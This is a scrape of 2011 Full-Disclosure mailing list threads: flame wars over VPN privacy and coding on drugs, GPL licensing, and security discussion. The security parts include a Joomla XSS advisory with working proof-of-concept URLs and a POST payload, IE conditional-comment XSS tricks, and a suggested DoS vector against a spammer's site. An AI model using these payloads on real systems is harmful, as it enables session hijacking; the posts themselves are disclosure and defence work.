On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony
Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities.
maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] VPN providers and any providers in general...
Here's a great idea that doesn't need LSD or being doped; *shut the fuck up*.
On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe
2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition.
On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.com wrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :)
2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typos. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when one's judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad.
On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself.
I know a guy who codes perl on LSD, writes good code too.
The one time i coded under the influence it did not end well...never again lol...
Re: [Full-disclosure] VPN providers and any providers in general...
Manners, on FD list? Are you trying to be funny?
On Mon, Oct 3, 2011 at 7:04 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:57 AM, Christian Sciberras wrote: Here's a great idea that doesn't need LSD or being doped; *shut the fuck up*.
On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe
2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition.
On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.com wrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :)
2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typos. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when one's judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad.
On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself.
I know a guy who codes perl on LSD, writes good code too.
The one time i coded under the influence it did not end well...never again lol...
You are pretty rude guy, didn't your mom ever teach you manners?
Re: [Full-disclosure] VPN providers and any providers in general...
I'm not sure who's the one acting like a child, the guy spamming people with bullshit or the other one telling him to do everyone a favor and shut up.
On Mon, Oct 3, 2011 at 7:13 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:06 AM, Christian Sciberras wrote: Manners, on FD list? Are you trying to be funny?
On Mon, Oct 3, 2011 at 7:04 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:57 AM, Christian Sciberras wrote: Here's a great idea that doesn't need LSD or being doped; *shut the fuck up*.
On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe
2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition.
On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.com wrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :)
2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typos. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when one's judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad.
On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself.
I know a guy who codes perl on LSD, writes good code too.
The one time i coded under the influence it did not end well...never again lol...
You are pretty rude guy, didn't your mom ever teach you manners?
Politeness goes a long long way no matter what sort of environment you are in. Screaming at people to shut up just makes you look like a child, if you dont like what i have to say dont listen to it.
Re: [Full-disclosure] VPN providers and any providers in general...
I know a guy who codes perl on LSD, writes good code too.
That's as much useful as what is commonly found in toilets. Or if you prefer a better comparison, regular spam is more useful. Too bad your spam gets past Google filters.
On Mon, Oct 3, 2011 at 7:21 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:16 AM, Christian Sciberras wrote: I'm not sure who's the one acting like a child, the guy spamming people with bullshit or the other one telling him to do everyone a favor and shut up.
On Mon, Oct 3, 2011 at 7:13 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:06 AM, Christian Sciberras wrote: Manners, on FD list? Are you trying to be funny?
On Mon, Oct 3, 2011 at 7:04 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:57 AM, Christian Sciberras wrote: Here's a great idea that doesn't need LSD or being doped; *shut the fuck up*.
On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe
2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition.
On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.com wrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :)
2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typos. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when one's judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad.
On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself.
I know a guy who codes perl on LSD, writes good code too.
The one time i coded under the influence it did not end well...never again lol...
You are pretty rude guy, didn't your mom ever teach you manners?
Politeness goes a long long way no matter what sort of environment you are in. Screaming at people to shut up just makes you look like a child, if you dont like what i have to say dont listen to it.
I was having a lovely conversation with people about the effects of intoxicants on coding skill until you came along, *again if you don't like the topic in question don't pay attention.*
Re: [Full-disclosure] http://www.bestcareersopportunities.com/
If it's connected to the Internet, it's already got an exploit ;)
On Wed, Aug 31, 2011 at 12:26 PM, Ben McGinnes b...@adversary.org wrote: On 31/08/11 4:30 PM, Jacqui Caren-home wrote: is running wordpress 3.2.1 This lahore based spammer is running a PPC link blog and is pushing his crap all over the social networks right now and has just appeared in my work spamtraps from botnett'd systems. Anyone know if the above site has any known exploits? Note the hosting company has been notified, so expect any attacks/tests to be monitored.
If they don't have the PHP floating point DOS attack workaround plug-in installed then that might be a vector.
https://core.trac.wordpress.org/ticket/16097
http://www.exploringbinary.com/php-hangs-on-numeric-value-2-2250738585072011e-308/
It also depends on which version of PHP they're running and whether it's been fixed yet (it's a PHP bug rather than a WordPress one). Regards, Ben
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
even better competing product and put us out of business and so on? That's exactly what Stallman was trying to prevent with the GPL. And the best part? He got the situation even worse. EOF On Wed, Aug 31, 2011 at 3:02 PM, valdis.kletni...@vt.edu wrote: On Wed, 31 Aug 2011 14:24:54 +1000, GloW - XD said: So basically once you sign over a GPL v2, you sign over any right to misuse even the code which you have written? That is indeed the basic point of the GPL - once you release something under the GPL, everybody who receives a copy is free to use it for new and interesting purposes, *including ones you don't approve of*. Ever actually read the EULA on most commercial packages, where you end up agreeing to onerous terms like You agree to not badmouth our company in public and you agree to not reverse engineer our code in order to make an even better competing product and put us out of business and so on? That's exactly what Stallman was trying to prevent with the GPL. I guess I thought this could be scrutinized outside of the GPL via means of a solicitor but, if the law is complacent about use and misuse then, I guess that's that and you're correct, I have actually yes, used myself the CC license and was thinking the GPL was just a simpler version but seems that is Nope, it's not just a simpler version. The GPL has different goals than the various CC licenses. The CC tends to be very good at I took this photo, it is *mine*, and you're allowed to use it as long as you don't make money off it that should be mine, or claim that you took it. But that's because that was the CC goal. The GPL was expressly designed so that people could easily take GPL-licensed software, fork it, and improve it - but then be unable to take the fork closed-source the way you can with a BSD license. It makes a *lot* more sense if you don't think of the GPL as protecting *your* rights, but protecting the *software's* right to be free and open.
(No, software doesn't have its own rights in the current legal system, but the logic is easier to follow if you think of it as if it *did* have rights). probably safer to go with CC I guess there at least you have some say over mis-use in cases where you specify which documents in particular, ie: sourcecode1.cpp,source2.cpp and v.cpp must not be modified... the rest could be.., for example. Note that going that route has its own issues. For instance, if the person comes up with a really neat patch to foobar.cpp which speeds the program up by 400% by using a better algorithm, but it involves adding an extra parameter to a function call located in source2.cpp, he may be stuck. Even more importantly, if he finds a bug *in* source2.cpp, he may not be able to patch it because that would be a modification. It also doesn't address using source2.cpp *without* modification but for evil purposes. (At least it's not as thoroughly broken as the Gnu Free Documentation License's concept of invariant sections - consider something where the title page has been declared an invariant section - or even better, the 'List of Changes in this version. Hilarity ensues ;) Also, there's actually a *range* of CC licenses, and it *is* possible to end up in a situation where you want to do a remix mash-up of 4 things, but two of them have incompatible licenses. For instance, if two both have share-alike, but one specifies commercial use and the other is non-commercial, you will have a really hard time distributing the result. Oh well, that shoots any theory then of why it is even being mentioned in the list, other than to potentially harm all users of tightvnc src. Bingo. GPL violations potentially harm the users of the GPL'ed software who don't receive their rights (which include a right to the source code so they can fix/improve what you gave them).
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x06
OK, let's take this in parts; 1. Here's a little secret. Life sucks no matter how you look at it. Now go cry in a corner, or try make something useful out of it. 2. Me, fame? You're kidding, right? 3. No I don't. I don't waste my time looking at Mr Esser (neither at anyone else, for the matter). 4. It remains that whatever you're calling art is simply attempts at fixing a problem of yours, (in an infantile manner if you ask me). 5. Huh? And I should care why exactly? Here's a crazy suggestion, stop spamming the list and go do something useful. Heck, at this point you even topped MustLive's stuff in uselessness. On Mon, Aug 8, 2011 at 8:39 PM, Herr E Balls mohsep.submissi...@googlemail.com wrote: Christian, How do you know how hard is life between studying for your CISSP exam for twelve years and getting rejected for being a mentor at Defcon Kids just because of that one time with the priests in Jaurez (and YES it was only once)? I don't think you do because if you did you would not be so off hand about my terrible half-strangled cries for some kind of acceptance from my peers? Why should be only people like you who get all the fame? The love? The tshirts? The twits. I WANT TOO Do you know, Christian how long you have to stare at Stefan Esser's face on Photoshop at 400% zoom before you wish that the nurses let you have sharp things? I do, Christian. It is 22 minutes. I timed it. Today. Then I try kill myself with my breakfast bowl. It no work. I have suffered for my art, Christian. And I am proud. That you should mock me for my pain is beyond me. I am a sad man. Also, well done in missing both the pop culture reference and Tavis' admittedly unexpected sense of humor. You now win at irony. Forever. On Mon, Aug 8, 2011 at 2:54 AM, Christian Sciberras uuf6...@gmail.com wrote: Don't kill his creativity. He's (cr|d)ying for some (self-presumed well-deserved) attention.
On Sun, Aug 7, 2011 at 9:00 PM, Tavis Ormandy tav...@cmpxchg8b.com wrote: Herr E Balls mohsep.submissi...@googlemail.com wrote: Hi Guys! Edition six of MOHSEP is here with no technical issues (we hired mexican guy called manuel to run servers in latvia for us!). Link is here: http://mohsepblog.blogspot.com/2011/08/saturday-august-6th-2011.html I pity the fool who photoshopped me. -- - tav...@cmpxchg8b.com | pgp encrypted mail preferred ---
Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks
I think it's worth noting that MSIE expects an *expression* in the conditional (it's a feature). Hence even if you disable direct XSS, there still would probably be more ways an *expression* could be used to write HTML code. As such, I don't think they should be fixing this (since it is intended), but rather warn developers about its existence. On the other hand, if developers are writing unfiltered HTML inside this conditional, I think there are worse issues than this. I've always believed in the philosophy of making browsers work as expected instead of expecting them to comply and fix my issues. Especially if the browser in question is Internet Explorer ;-). Cheers, Chris. On Mon, Aug 8, 2011 at 5:59 AM, CnCxzSec衰仔 cncxzh...@gmail.com wrote: this is a normal use, but !--[ifimg/onerror=alert(1) src=] is an unnormal use. IE should regard this as an HTML comment instead of a downlevel-hidden comment, so the HTML tags inside the COMMENT should not be evaled. On Mon, Aug 8, 2011 at 11:30 AM, Andrew Farmer andf...@gmail.com wrote: On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote: hi all, here is an interesting trick to perform an xss attack with IE browsers. some rich text applications such as email and blog, may provide HTML uses but have a policy to block the on-event execution to prevent the XSS attack. However, these applications may also allow the HTML notes uses, for instance !-- -- Any such applications are likely to also be vulnerable to a simpler attack based on downlevel-hidden conditional comments: !--[if IE] scriptanything you want can go here, presumably/script ![endif]--
Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks
Javascript: if(alert(1)); // executed i(alert(1)); // not executed (TypeError: i is not a function) It's worth noting that Firefox (5) does execute the inside function, whereas Chrome (13) and IE(9) do not. Talk about browser consistency... On Mon, Aug 8, 2011 at 9:38 AM, CnCxzSec衰仔 cncxzh...@gmail.com wrote: a good example to see the incorrect handling: !--[ifimg/onerror=alert(1) src=] //executed. !--[iimg/onerror=alert(1) src=]//not executed. On Mon, Aug 8, 2011 at 2:23 PM, Christian Sciberras uuf6...@gmail.com wrote: I think it's worth noting that MSIE expects an *expression* in the conditional (it's a feature). Hence even if you disable direct XSS, there still would probably be more ways an *expression* could be used to write HTML code. As such, I don't think they should be fixing this (since it is intended), but rather warn developers about its existence. On the other hand, if developers are writing unfiltered HTML inside this conditional, I think there are worse issues than this. I've always believed in the philosophy of making browsers work as expected instead of expecting them to comply and fix my issues. Especially if the browser in question is Internet Explorer ;-). Cheers, Chris. On Mon, Aug 8, 2011 at 5:59 AM, CnCxzSec衰仔 cncxzh...@gmail.com wrote: this is a normal use, but !--[ifimg/onerror=alert(1) src=] is an unnormal use. IE should regard this as an HTML comment instead of a downlevel-hidden comment, so the HTML tags inside the COMMENT should not be evaled. On Mon, Aug 8, 2011 at 11:30 AM, Andrew Farmer andf...@gmail.com wrote: On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote: hi all, here is an interesting trick to perform an xss attack with IE browsers. some rich text applications such as email and blog, may provide HTML uses but have a policy to block the on-event execution to prevent the XSS attack.
However, these applications may also allow the HTML notes uses, for instance !-- -- Any such applications are likely to also be vulnerable to a simpler attack based on downlevel-hidden conditional comments: !--[if IE] scriptanything you want can go here, presumably/script ![endif]--
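Added example (not part of the thread, and not code from any application discussed in it): a Python contrast between a filter that strips on-event markup but passes HTML comments through, as the posts describe, and a sanitizer that rebuilds the fragment from parsed tokens and never re-emits comments. The sample input, tag policy and function names are constructed for this illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample: an on-event attribute plus a downlevel-hidden conditional
# comment of the kind discussed in the thread (placeholder script body).
SAMPLE = ('Hello <b onclick="x()">world</b>'
          '<!--[if IE]><script>placeholder()</script><![endif]--> bye')

COMMENT = re.compile(r"(<!--.*?-->)", re.DOTALL)
ON_EVENT = re.compile(r"""\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)
SCRIPT = re.compile(r"<script\b.*?</script\s*>", re.I | re.DOTALL)


def naive_filter(fragment):
    """Weak policy from the thread: strip script and on-event markup, but
    pass HTML comments through untouched."""
    parts = COMMENT.split(fragment)          # odd indexes are the comments
    return "".join(part if i % 2 else ON_EVENT.sub("", SCRIPT.sub("", part))
                   for i, part in enumerate(parts))


# Hypothetical allowlist policy for a rich-text field.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}


class Sanitizer(HTMLParser):
    """Rebuild the fragment from parsed tokens; comments are never re-emitted."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped_comments, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
        if self._skip or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue
            if name == "href" and not value.lower().startswith(("http://", "https://")):
                continue
            kept += ' %s="%s"' % (name, escape(value, quote=True))
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        # Conditional comments arrive here like any other comment. Their body
        # is markup that IE evaluates (per the thread), so it is dropped.
        self.dropped_comments.append(data)


def sanitize(fragment):
    """Return (clean_html, list_of_dropped_comment_bodies)."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped_comments


if __name__ == "__main__":
    print("naive   :", naive_filter(SAMPLE))
    print("rebuilt :", sanitize(SAMPLE)[0])
```
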
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x06
Don't kill his creativity. He's (cr|d)ying for some (self-presumed well-deserved) attention. On Sun, Aug 7, 2011 at 9:00 PM, Tavis Ormandy tav...@cmpxchg8b.com wrote: Herr E Balls mohsep.submissi...@googlemail.com wrote: Hi Guys! Edition six of MOHSEP is here with no technical issues (we hired mexican guy called manuel to run servers in latvia for us!). Link is here: http://mohsepblog.blogspot.com/2011/08/saturday-august-6th-2011.html I pity the fool who photoshopped me. -- - tav...@cmpxchg8b.com | pgp encrypted mail preferred ---
Re: [Full-disclosure] Encrypted files and the 5th amendment
Not to cut the chatter, but one question remains; where's the solution?
Re: [Full-disclosure] EC-Council's Sanjay Bavisi Hacking Series: Identifying Target IPs and Monitoring Google IPs
You're kidding, right? If you feel like trolling, there's this *great* site: http://encyclopediadramatica.ch/ Stop wasting people's time. On Fri, Jul 8, 2011 at 9:41 PM, Ron Goldstien securitygeek...@gmail.com wrote: Hello hackers, here is EC-Council's Sanjay Jay Bavisi's Hacking Series video tutorial #1. Today, Jay shows you how to: 1. Identify your network speed 2. Find the IP addresses of your targets 3. Use Tracer T to find who is looking at any website 4. Use Tracer T to find who is viewing google at this moment 5. Monitor other people's network speeds As always friends, use this information for Certified Ethical Hacking (CEH) and Certified Ethical Spamming (CES) purposes only. Without further ado: http://www.youtube.com/watch?v=SXmv8quf_xM
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
I've tested the PoCs on 1.5.22 and some 1.0 sites, and I consistently get a 403 error. Perhaps by 1.6.3 and lower you meant 1.6.x? Cheers, Chris. On Tue, Jun 28, 2011 at 8:25 AM, YGN Ethical Hacker Group li...@yehg.net wrote: Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities 1. OVERVIEW Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (QueryString, option, searchword) in Joomla! Core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSION AFFECTED 1.6.3 and lower 5.
PROOF-OF-CONCEPT/EXPLOIT component: com_contact , parameter: QueryString (Browser: All) === http://attacker.in/joomla163_noseo/index.php?option=com_contactview=categorycatid=26id=36Itemid=-1 scriptalert(/XSS/)/script component:com_content , parameter: QueryString (Browser: All) === http://attacker.in/joomla163_noseo/index.php?option=com_contentview=categoryid=19Itemid=260limit=10filter_order_Dir=limitstart=filter_order= scriptalert(/XSS/)/script component: com_newsfeeds , parameter: QueryString (Browser: All) = http://attacker.in/joomla163_noseo/index.php?option=com_newsfeedsview=categoryid=17whateverehere= scriptalert(/XSS/)/scriptItemid=253limit=10filter_order_Dir=ASCfilter_order=ordering parameter: option (Browser: All) http://attacker.in/joomla163_noseo/index.php?option= scriptalert(/XSS/)/scripttask=reset.request component: com_search, parameter: searchword (Browser: IE, Konqueror) = [REQUEST] POST /joomla163/index.php HTTP/1.1 Referer: http://attacker.in/joomla163/ User-Agent: Konqueror/4.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: attacker.in Accept-Encoding: gzip, deflate Content-Length: 125 option=com_searchsearchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253Etask=search [/REQUEST] This searchword XSS was identified via source code: http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg 6. IMPACT Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. 7. SOLUTION Upgrade to Joomla! 1.6.4 or higher 8. VENDOR Joomla! Developer Team http://www.joomla.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-05-26: notified vendor 2011-06-28: vendor released fix 2011-06-28: vulnerability disclosed 11. 
REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS) Vendor Advisory URL: http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html XSS FAQ: http://www.cgisecurity.com/xss-faq.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-06-28]
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
Rather than that, I'd say the dev team is out of sync with the security team.. On Tue, Jun 28, 2011 at 5:59 PM, Jacqui Caren-home jacqui.ca...@ntlworld.com wrote: On 28/06/2011 07:25, YGN Ethical Hacker Group wrote: Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities FYI 1.5.21 seems to be AOK. IMHO The Joomla team do not seem to grok the concept of regression testing and keep re-introducing the same XSS problems over and over :-) Jacqui
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
I think you meant apache follows symlinks even when -FollowSymLinks is *not* set. Otherwise it doesn't seem to make sense? Cheers, Chris. On Fri, Jun 24, 2011 at 5:14 PM, halfdog m...@halfdog.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 For those, who did not already know: Due to specification, apache follows symlinks even when -FollowSymLinks is set, when the data is modified concurrently. This can be trivially shown as demonstrated in http://www.halfdog.net/Security/2011/ApacheNoFollowSymlinkTimerace/ . When performing host hardening, do not think, the -FollowSymLinks option alone will prevent you from symlink attacks. - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFOBKnlxFmThv7tq+4RAssHAJ4jiIVCzRLrVFeR6NOXaMSnyOf17ACdEnop yY8Z4UJ9saIxDmDBy/KEZTI= =eNhL -END PGP SIGNATURE-
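Added example (not Apache's code and not from the posts): the general pattern behind a symlink time race, shown in Python on Linux. A check made on a path name and a later open of the same name are two steps with a window between them, whereas opening each component relative to its parent with O_NOFOLLOW lets the kernel refuse symlinks in the same call. The directory layout and function names are constructed for this illustration.

```python
import os
import stat
import tempfile


def open_checked_then_used(path):
    """Racy pattern: inspect the name, then open the same name again."""
    if stat.S_ISLNK(os.lstat(path).st_mode):
        raise PermissionError("symlink refused: %s" % path)
    # Window: the name can be replaced by a symlink between lstat and open.
    return os.open(path, os.O_RDONLY)


def open_beneath(root, relpath):
    """Open relpath under root, refusing symlinks in every component.

    Each component is opened relative to the already-open parent directory
    with O_NOFOLLOW, so check and open are a single kernel operation.
    """
    parts = [p for p in relpath.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise PermissionError("bad path: %r" % relpath)
    dir_fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for name in parts[:-1]:
            flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
            next_fd = os.open(name, flags, dir_fd=dir_fd)
            os.close(dir_fd)
            dir_fd = next_fd
        return os.open(parts[-1], os.O_RDONLY | os.O_NOFOLLOW, dir_fd=dir_fd)
    finally:
        os.close(dir_fd)


def demo():
    """Build a constructed docroot and report how each path is handled."""
    results = {}
    with tempfile.TemporaryDirectory() as top:
        root = os.path.join(top, "docroot")
        os.makedirs(os.path.join(root, "pub"))
        with open(os.path.join(top, "secret.txt"), "w") as fh:
            fh.write("outside docroot")
        with open(os.path.join(root, "pub", "index.html"), "w") as fh:
            fh.write("hello")
        os.symlink("../secret.txt", os.path.join(root, "leak"))  # file symlink
        os.symlink("..", os.path.join(root, "up"))               # directory symlink
        for rel in ("pub/index.html", "leak", "up/secret.txt"):
            try:
                fd = open_beneath(root, rel)
            except OSError:
                results[rel] = "refused"
                continue
            results[rel] = os.read(fd, 64).decode()
            os.close(fd)
    return results


if __name__ == "__main__":
    for path, outcome in demo().items():
        print("%-16s %s" % (path, outcome))
```
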
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
Ah, I see. For a moment I confused -FollowSymLinks with a shell parameter. My bad, Chris. On Fri, Jun 24, 2011 at 6:15 PM, Ferenc Kovacs tyr...@gmail.com wrote: On Fri, Jun 24, 2011 at 5:24 PM, Christian Sciberras uuf6...@gmail.com wrote: I think you meant apache follows symlinks even when -FollowSymLinks is not set. Otherwise it doesn't seem to make sense? -FollowSymLinks turns off the FollowSymLinks option without resetting the other Options. http://wiki.apache.org/httpd/FAQ#Why_do_my_Options_directives_not_have_the_desired_effect.3F Tyrael
Re: [Full-disclosure] ASHX, ASMX or What?
